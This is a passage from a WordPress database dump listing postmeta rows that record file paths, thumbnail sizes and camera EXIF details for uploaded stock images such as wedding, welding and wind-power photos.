\";s:5:\"width\";i:1170;s:6:\"height\";i:778;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:22:\"www.simpletapestry.com\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:63:\"Creative and Alternative Wedding Photographers Northern Ireland\";s:17:\"created_timestamp\";s:10:\"1420194460\";s:9:\"copyright\";s:36:\"All rights reserved. Simple Tapestry\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:63:\"Creative and Alternative Wedding Photographers Northern Ireland\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:8:{i:0;s:7:\"wedding\";i:1;s:12:\"photographer\";i:2;s:7:\"Ireland\";i:3;s:7:\"Belfast\";i:4;s:6:\"Dublin\";i:5;s:11:\"photography\";i:6;s:20:\"destination weddings\";i:7;s:11:\"Alternative\";}}}'),(400,170,'_wp_attached_file','2017/10/wedding-table.jpg'),(401,170,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:25:\"2017/10/wedding-table.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"wedding-table-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"wedding-table-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"wedding-table-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"Canon EOS 30D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"55\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:8:\"0.003125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(402,171,'_wp_attached_file','2017/10/wedding-venue.jpg'),(403,171,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:25:\"2017/10/wedding-venue.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"wedding-venue-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"wedding-venue-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"wedding-venue-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 6D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:8:\"0.003125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(404,172,'_wp_attached_file','2017/10/weld.jpg'),(405,172,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:639;s:4:\"file\";s:16:\"2017/10/weld.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"weld-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"weld-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"weld-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(406,173,'_wp_attached_file','2017/10/welding.jpg'),(407,173,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:539;s:4:\"file\";s:19:\"2017/10/welding.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"welding-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"welding-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"welding-768x431.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:431;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D3200\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"92\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:8:\"0.003125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(408,174,'_wp_attached_file','2017/10/well-being.jpg'),(409,174,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:22:\"2017/10/well-being.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"well-being-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"well-being-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"well-being-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"9\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D3300\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"18\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(410,175,'_wp_attached_file','2017/10/wet-iphone-6s.jpg'),(411,175,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:25:\"2017/10/wet-iphone-6s.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"wet-iphone-6s-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"wet-iphone-6s-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"wet-iphone-6s-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:4:\"E-M5\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"43\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(412,176,'_wp_attached_file','2017/10/wet-pencils.jpg'),(413,176,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:23:\"2017/10/wet-pencils.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"wet-pencils-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"wet-pencils-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"wet-pencils-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(414,177,'_wp_attached_file','2017/10/what-door.jpg'),(415,177,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:512;s:4:\"file\";s:21:\"2017/10/what-door.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"what-door-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"what-door-300x160.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"what-door-768x410.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(416,178,'_wp_attached_file','2017/10/wheelchair-carer.jpg'),(417,178,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:28:\"2017/10/wheelchair-carer.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"wheelchair-carer-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"wheelchair-carer-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"wheelchair-carer-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(418,179,'_wp_attached_file','2017/10/white-books.jpg'),(419,179,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:521;s:4:\"file\";s:23:\"2017/10/white-books.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"white-books-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"white-books-300x163.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:163;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"white-books-768x417.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:417;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D7000\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:9:\"0.0015625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(420,180,'_wp_attached_file','2017/10/white-keyboard.jpg'),(421,180,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:26:\"2017/10/white-keyboard.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"white-keyboard-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"white-keyboard-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"white-keyboard-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(422,181,'_wp_attached_file','2017/10/white-lamb.jpg'),(423,181,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:565;s:4:\"file\";s:22:\"2017/10/white-lamb.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"white-lamb-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"white-lamb-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"white-lamb-768x452.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:452;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(424,182,'_wp_attached_file','2017/10/white-teeth.jpg'),(425,182,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:957;s:6:\"height\";i:720;s:4:\"file\";s:23:\"2017/10/white-teeth.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"white-teeth-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"white-teeth-300x226.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"white-teeth-768x578.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 700D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"55\";s:3:\"iso\";s:4:\"3200\";s:13:\"shutter_speed\";s:9:\"0.0015625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(428,184,'_wp_attached_file','2017/10/wifi-logo.png'),(429,184,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:691;s:4:\"file\";s:21:\"2017/10/wifi-logo.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"wifi-logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"wifi-logo-300x216.png\";s:5:\"width\";i:300;s:6:\"height\";i:216;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"wifi-logo-768x553.png\";s:5:\"width\";i:768;s:6:\"height\";i:553;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(430,185,'_wp_attached_file','2017/10/Will-Polaroid.png'),(431,185,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:343;s:6:\"height\";i:353;s:4:\"file\";s:25:\"2017/10/Will-Polaroid.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Will-Polaroid-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Will-Polaroid-292x300.png\";s:5:\"width\";i:292;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(432,186,'_wp_attached_file','2017/10/Wiltshire-grass.jpg'),(433,186,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:27:\"2017/10/Wiltshire-grass.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Wiltshire-grass-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Wiltshire-grass-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"Wiltshire-grass-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(434,187,'_wp_attached_file','2017/10/wiltshire-map.png'),(435,187,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:370;s:6:\"height\";i:346;s:4:\"file\";s:25:\"2017/10/wiltshire-map.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"wiltshire-map-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"wiltshire-map-300x281.png\";s:5:\"width\";i:300;s:6:\"height\";i:281;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(436,188,'_wp_attached_file','2017/10/wind-and-mountains.jpg'),(437,188,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:526;s:4:\"file\";s:30:\"2017/10/wind-and-mountains.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"wind-and-mountains-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"wind-and-mountains-300x164.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:164;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"wind-and-mountains-768x421.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:421;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(440,190,'_wp_attached_file','2017/10/wind-farm.jpg'),(441,190,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:21:\"2017/10/wind-farm.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"wind-farm-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"wind-farm-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"wind-farm-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:19:\"Canon EOS REBEL T2i\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"18\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(442,191,'_wp_attached_file','2017/10/wind-power-sky.jpg'),(443,191,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:581;s:4:\"file\";s:26:\"2017/10/wind-power-sky.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"wind-power-sky-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"wind-power-sky-300x182.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"wind-power-sky-768x465.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:465;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"11\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D3300\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"122\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(444,192,'_wp_attached_file','2017/10/wind-power.jpg'),(445,192,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:540;s:4:\"file\";s:22:\"2017/10/wind-power.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"wind-power-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"wind-power-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"wind-power-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(446,193,'_wp_attached_file','2017/10/wind-turbine-sun.jpg'),(447,193,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:28:\"2017/10/wind-turbine-sun.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"wind-turbine-sun-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"w